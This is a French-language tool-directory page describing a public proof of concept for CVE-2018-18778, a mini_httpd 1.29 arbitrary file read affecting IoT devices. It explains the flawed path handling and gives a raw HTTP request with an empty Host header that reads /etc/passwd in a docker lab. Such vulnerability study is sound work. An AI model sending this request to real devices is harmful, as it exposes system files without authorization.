Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Mini_httpd-CVE-2018-18778 — PoC exploit pour CVE-2018-18778 : lecture arbitraire de fichier dans mini_httpd 1.29 via un en-tête Host vide, affectant les appareils IoT de Huawei, Zyxel et d'autres. | Kitploit
Outils/GitHubGitHub/cyberharsh/mini_httpd-cve-2018-18778
Sécurité des Systèmes EmbarquésSécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebFuzzing
GitHubcyberharsh/mini_httpd-cve-2018-18778

Mini_httpd-CVE-2018-18778

PoC exploit pour CVE-2018-18778 : lecture arbitraire de fichier dans mini_httpd 1.29 via un en-tête Host vide, affectant les appareils IoT de Huawei, Zyxel et d'autres.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
53il y a 6 ansPas encore vérifié

Vulnérabilité de lecture de fichier arbitraire dans mini_httpd (CVE-2018-18778)

Mini_httpd est un serveur HTTP minimaliste qui maintient un certain niveau de performance (environ 90 % d'Apache) tout en utilisant peu de ressources système. Il est donc largement utilisé comme serveur embarqué dans divers appareils IoT (routeurs, commutateurs, caméras, etc.). Des fabricants tels que Huawei, Zyxel, Hikvision, Raspberry Pi, etc., ont tous utilisé le composant Mini_httpd dans leurs appareils.

Lorsque le mode hôte virtuel est activé dans mini_httpd, une requête utilisateur http://HOST/FILE accédera au fichier HOST/FILE dans le répertoire courant.

(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname, f );

Voir le code ci-dessus, analyse comme suit :

  • Lorsque HOST=example.com et FILE=index.html, le résultat de l'instruction ci-dessus est example.com/index.html, le fichier est lu normalement.
  • Lorsque HOST est vide et FILE=etc/passwd, le résultat de l'instruction ci-dessus est /etc/passwd.
  • Ce dernier est traité comme un chemin absolu, donc /etc/passwd est lu, provoquant une vulnérabilité de lecture de fichier arbitraire.

Configuration de l'environnement

Exécutez la commande suivante pour démarrer mini_httpd 1.29 :

docker-compose up -d

Une fois l'environnement démarré, accédez à http://your-ip:8080 pour voir la page Web.

Reproduction de la vulnérabilité

Envoyez une requête en définissant Host à vide et PATH sur le chemin absolu du fichier :

GET /etc/passwd HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


Fichier lu avec succès :

Télécharger l’outil